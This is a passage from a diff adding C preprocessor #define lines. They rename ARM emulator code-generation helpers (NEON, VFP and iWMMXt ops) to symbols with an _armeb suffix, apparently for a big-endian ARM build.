gen_helper_neon_abd_u16_armeb +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_armeb +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_armeb +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_armeb +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_armeb +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_armeb +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_armeb +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_armeb +#define 
gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_armeb +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_armeb +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_armeb +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_armeb +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_armeb +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_armeb +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_armeb +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_armeb +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_armeb +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_armeb +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_armeb +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_armeb +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_armeb +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_armeb +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_armeb +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_armeb +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_armeb +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_armeb +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_armeb +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_armeb +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_armeb +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_armeb +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_armeb +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_armeb +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_armeb +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_armeb +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_armeb +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_armeb +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_armeb +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_armeb +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_armeb +#define 
gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_armeb +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_armeb +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_armeb +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_armeb +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_armeb +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_armeb +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_armeb +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_armeb +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_armeb +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_armeb +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_armeb +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_armeb +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_armeb +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_armeb +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_armeb +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_armeb +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_armeb +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_armeb +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_armeb +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_armeb +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_armeb +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_armeb +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_armeb +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_armeb +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_armeb +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_armeb +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_armeb +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_armeb +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_armeb +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_armeb +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_armeb +#define gen_helper_neon_mul_u8 
gen_helper_neon_mul_u8_armeb +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_armeb +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_armeb +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_armeb +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_armeb +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_armeb +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_armeb +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_armeb +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_armeb +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_armeb +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_armeb +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_armeb +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_armeb +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_armeb +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_armeb +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_armeb +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_armeb +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_armeb +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_armeb +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_armeb +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_armeb +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_armeb +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_armeb +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_armeb +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_armeb +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_armeb +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_armeb +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_armeb +#define gen_helper_neon_pmull_64_lo 
gen_helper_neon_pmull_64_lo_armeb +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_armeb +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_armeb +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_armeb +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_armeb +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_armeb +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_armeb +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_armeb +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_armeb +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_armeb +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_armeb +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_armeb +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_armeb +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_armeb +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_armeb +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_armeb +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_armeb +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_armeb +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_armeb +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_armeb +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_armeb +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_armeb +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_armeb +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_armeb +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_armeb +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_armeb +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_armeb +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_armeb +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_armeb +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_armeb +#define gen_helper_neon_qshl_s8 
gen_helper_neon_qshl_s8_armeb +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_armeb +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_armeb +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_armeb +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_armeb +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_armeb +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_armeb +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_armeb +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_armeb +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_armeb +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_armeb +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_armeb +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_armeb +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_armeb +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_armeb +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_armeb +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_armeb +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_armeb +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_armeb +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_armeb +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_armeb +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_armeb +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_armeb +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_armeb +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_armeb +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_armeb +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_armeb +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_armeb +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_armeb +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_armeb +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_armeb +#define 
gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_armeb +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_armeb +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_armeb +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_armeb +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_armeb +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_armeb +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_armeb +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_armeb +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_armeb +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_armeb +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_armeb +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_armeb +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_armeb +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_armeb +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_armeb +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_armeb +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_armeb +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_armeb +#define gen_helper_neon_tbl gen_helper_neon_tbl_armeb +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_armeb +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_armeb +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_armeb +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_armeb +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_armeb +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_armeb +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_armeb +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_armeb +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_armeb +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_armeb +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_armeb +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_armeb +#define 
gen_helper_neon_zip16 gen_helper_neon_zip16_armeb +#define gen_helper_neon_zip8 gen_helper_neon_zip8_armeb +#define gen_helper_pre_hvc gen_helper_pre_hvc_armeb +#define gen_helper_pre_smc gen_helper_pre_smc_armeb +#define gen_helper_qadd16 gen_helper_qadd16_armeb +#define gen_helper_qadd8 gen_helper_qadd8_armeb +#define gen_helper_qaddsubx gen_helper_qaddsubx_armeb +#define gen_helper_qsub16 gen_helper_qsub16_armeb +#define gen_helper_qsub8 gen_helper_qsub8_armeb +#define gen_helper_qsubaddx gen_helper_qsubaddx_armeb +#define gen_helper_rbit gen_helper_rbit_armeb +#define gen_helper_recpe_f32 gen_helper_recpe_f32_armeb +#define gen_helper_recpe_u32 gen_helper_recpe_u32_armeb +#define gen_helper_recps_f32 gen_helper_recps_f32_armeb +#define gen_helper_rintd gen_helper_rintd_armeb +#define gen_helper_rintd_exact gen_helper_rintd_exact_armeb +#define gen_helper_rints gen_helper_rints_armeb +#define gen_helper_rints_exact gen_helper_rints_exact_armeb +#define gen_helper_ror_cc gen_helper_ror_cc_armeb +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_armeb +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_armeb +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_armeb +#define gen_helper_sadd16 gen_helper_sadd16_armeb +#define gen_helper_sadd8 gen_helper_sadd8_armeb +#define gen_helper_saddsubx gen_helper_saddsubx_armeb +#define gen_helper_sar_cc gen_helper_sar_cc_armeb +#define gen_helper_sdiv gen_helper_sdiv_armeb +#define gen_helper_sel_flags gen_helper_sel_flags_armeb +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_armeb +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_armeb +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_armeb +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_armeb +#define gen_helper_set_rmode gen_helper_set_rmode_armeb +#define gen_helper_set_user_reg gen_helper_set_user_reg_armeb +#define gen_helper_shadd16 gen_helper_shadd16_armeb +#define gen_helper_shadd8 gen_helper_shadd8_armeb +#define 
gen_helper_shaddsubx gen_helper_shaddsubx_armeb +#define gen_helper_shl_cc gen_helper_shl_cc_armeb +#define gen_helper_shr_cc gen_helper_shr_cc_armeb +#define gen_helper_shsub16 gen_helper_shsub16_armeb +#define gen_helper_shsub8 gen_helper_shsub8_armeb +#define gen_helper_shsubaddx gen_helper_shsubaddx_armeb +#define gen_helper_ssat gen_helper_ssat_armeb +#define gen_helper_ssat16 gen_helper_ssat16_armeb +#define gen_helper_ssub16 gen_helper_ssub16_armeb +#define gen_helper_ssub8 gen_helper_ssub8_armeb +#define gen_helper_ssubaddx gen_helper_ssubaddx_armeb +#define gen_helper_sub_saturate gen_helper_sub_saturate_armeb +#define gen_helper_sxtb16 gen_helper_sxtb16_armeb +#define gen_helper_uadd16 gen_helper_uadd16_armeb +#define gen_helper_uadd8 gen_helper_uadd8_armeb +#define gen_helper_uaddsubx gen_helper_uaddsubx_armeb +#define gen_helper_udiv gen_helper_udiv_armeb +#define gen_helper_uhadd16 gen_helper_uhadd16_armeb +#define gen_helper_uhadd8 gen_helper_uhadd8_armeb +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_armeb +#define gen_helper_uhsub16 gen_helper_uhsub16_armeb +#define gen_helper_uhsub8 gen_helper_uhsub8_armeb +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_armeb +#define gen_helper_uqadd16 gen_helper_uqadd16_armeb +#define gen_helper_uqadd8 gen_helper_uqadd8_armeb +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_armeb +#define gen_helper_uqsub16 gen_helper_uqsub16_armeb +#define gen_helper_uqsub8 gen_helper_uqsub8_armeb +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_armeb +#define gen_helper_usad8 gen_helper_usad8_armeb +#define gen_helper_usat gen_helper_usat_armeb +#define gen_helper_usat16 gen_helper_usat16_armeb +#define gen_helper_usub16 gen_helper_usub16_armeb +#define gen_helper_usub8 gen_helper_usub8_armeb +#define gen_helper_usubaddx gen_helper_usubaddx_armeb +#define gen_helper_uxtb16 gen_helper_uxtb16_armeb +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_armeb +#define gen_helper_v7m_msr gen_helper_v7m_msr_armeb +#define 
gen_helper_vfp_absd gen_helper_vfp_absd_armeb +#define gen_helper_vfp_abss gen_helper_vfp_abss_armeb +#define gen_helper_vfp_addd gen_helper_vfp_addd_armeb +#define gen_helper_vfp_adds gen_helper_vfp_adds_armeb +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_armeb +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_armeb +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_armeb +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_armeb +#define gen_helper_vfp_divd gen_helper_vfp_divd_armeb +#define gen_helper_vfp_divs gen_helper_vfp_divs_armeb +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_armeb +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_armeb +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_armeb +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_armeb +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_armeb +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_armeb +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_armeb +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_armeb +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_armeb +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_armeb +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_armeb +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_armeb +#define gen_helper_vfp_mins gen_helper_vfp_mins_armeb +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_armeb +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_armeb +#define gen_helper_vfp_muld gen_helper_vfp_muld_armeb +#define gen_helper_vfp_muls gen_helper_vfp_muls_armeb +#define gen_helper_vfp_negd gen_helper_vfp_negd_armeb +#define gen_helper_vfp_negs gen_helper_vfp_negs_armeb +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_armeb +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_armeb +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_armeb +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_armeb +#define gen_helper_vfp_sitos 
gen_helper_vfp_sitos_armeb +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_armeb +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_armeb +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_armeb +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_armeb +#define gen_helper_vfp_subd gen_helper_vfp_subd_armeb +#define gen_helper_vfp_subs gen_helper_vfp_subs_armeb +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_armeb +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_armeb +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_armeb +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_armeb +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_armeb +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_armeb +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_armeb +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_armeb +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_armeb +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_armeb +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_armeb +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_armeb +#define gen_helper_vfp_touid gen_helper_vfp_touid_armeb +#define gen_helper_vfp_touis gen_helper_vfp_touis_armeb +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_armeb +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_armeb +#define gen_helper_vfp_tould gen_helper_vfp_tould_armeb +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_armeb +#define gen_helper_vfp_touls gen_helper_vfp_touls_armeb +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_armeb +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_armeb +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_armeb +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_armeb +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_armeb +#define gen_helper_vfp_ultod 
gen_helper_vfp_ultod_armeb +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_armeb +#define gen_helper_wfe gen_helper_wfe_armeb +#define gen_helper_wfi gen_helper_wfi_armeb +#define gen_hvc gen_hvc_armeb +#define gen_intermediate_code_internal gen_intermediate_code_internal_armeb +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_armeb +#define gen_iwmmxt_address gen_iwmmxt_address_armeb +#define gen_iwmmxt_shift gen_iwmmxt_shift_armeb +#define gen_jmp gen_jmp_armeb +#define gen_load_and_replicate gen_load_and_replicate_armeb +#define gen_load_exclusive gen_load_exclusive_armeb +#define gen_logic_CC gen_logic_CC_armeb +#define gen_logicq_cc gen_logicq_cc_armeb +#define gen_lookup_tb gen_lookup_tb_armeb +#define gen_mov_F0_vreg gen_mov_F0_vreg_armeb +#define gen_mov_F1_vreg gen_mov_F1_vreg_armeb +#define gen_mov_vreg_F0 gen_mov_vreg_F0_armeb +#define gen_muls_i64_i32 gen_muls_i64_i32_armeb +#define gen_mulu_i64_i32 gen_mulu_i64_i32_armeb +#define gen_mulxy gen_mulxy_armeb +#define gen_neon_add gen_neon_add_armeb +#define gen_neon_addl gen_neon_addl_armeb +#define gen_neon_addl_saturate gen_neon_addl_saturate_armeb +#define gen_neon_bsl gen_neon_bsl_armeb +#define gen_neon_dup_high16 gen_neon_dup_high16_armeb +#define gen_neon_dup_low16 gen_neon_dup_low16_armeb +#define gen_neon_dup_u8 gen_neon_dup_u8_armeb +#define gen_neon_mull gen_neon_mull_armeb +#define gen_neon_narrow gen_neon_narrow_armeb +#define gen_neon_narrow_op gen_neon_narrow_op_armeb +#define gen_neon_narrow_sats gen_neon_narrow_sats_armeb +#define gen_neon_narrow_satu gen_neon_narrow_satu_armeb +#define gen_neon_negl gen_neon_negl_armeb +#define gen_neon_rsb gen_neon_rsb_armeb +#define gen_neon_shift_narrow gen_neon_shift_narrow_armeb +#define gen_neon_subl gen_neon_subl_armeb +#define gen_neon_trn_u16 gen_neon_trn_u16_armeb +#define gen_neon_trn_u8 gen_neon_trn_u8_armeb +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_armeb +#define gen_neon_unzip gen_neon_unzip_armeb 
+#define gen_neon_widen gen_neon_widen_armeb +#define gen_neon_zip gen_neon_zip_armeb +#define gen_new_label gen_new_label_armeb +#define gen_nop_hint gen_nop_hint_armeb +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_armeb +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_armeb +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_armeb +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_armeb +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_armeb +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_armeb +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_armeb +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_armeb +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_armeb +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_armeb +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_armeb +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_armeb +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_armeb +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_armeb +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_armeb +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_armeb +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_armeb +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_armeb +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_armeb +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_armeb +#define 
gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_armeb +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_armeb +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_armeb +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_armeb +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_armeb +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_armeb +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_armeb +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_armeb +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_armeb +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_armeb +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_armeb +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_armeb +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_armeb +#define 